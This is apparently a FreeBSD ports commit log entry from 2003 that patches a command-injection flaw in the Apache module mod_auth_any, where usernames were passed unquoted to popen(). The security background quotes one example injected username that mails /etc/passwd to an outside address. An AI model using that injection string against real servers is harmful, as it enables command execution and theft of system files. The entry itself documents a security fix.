I am looking for an LTO tape library. Do you have one to spare?
Commit found by message id
Tue, 25 Mar 2003
[ 04:23:11 lioux ] mod_auth_anywww Apache module to use any command line program to authenticate a user
o Fix vulnerability that allows execution of arbitrary commands on
the server with the uid of the apache process. Background :
"The module accepts a username and password from the web client,
passes them to a user-space executable (using popen(3), which invokes
a shell) and waits for a response in order to authenticate the user.
The password is quoted on the popen() command line to avoid
interpretation of shell special chars, but the username is not.
Thus a malicious user can execute commands by supplying an appropriately
crafted username. (e.g. "foo&mail firstname.lastname@example.org</etc/passwd")
"The problem is easily fixed by adding quotes (and escaping any
quotes already present) to the username and password in the popen
o Fix this by adding a escaping function from . Then, modifying
this function appropriately with ideas from . Apply the new
escaping code to mod_auth_any.
o Bump PORTREVISION
Submitted by: Security Officer (nectar),
Red Hat Security Response Team <email@example.com> 
Obtained from: mod_auth_any CVS ,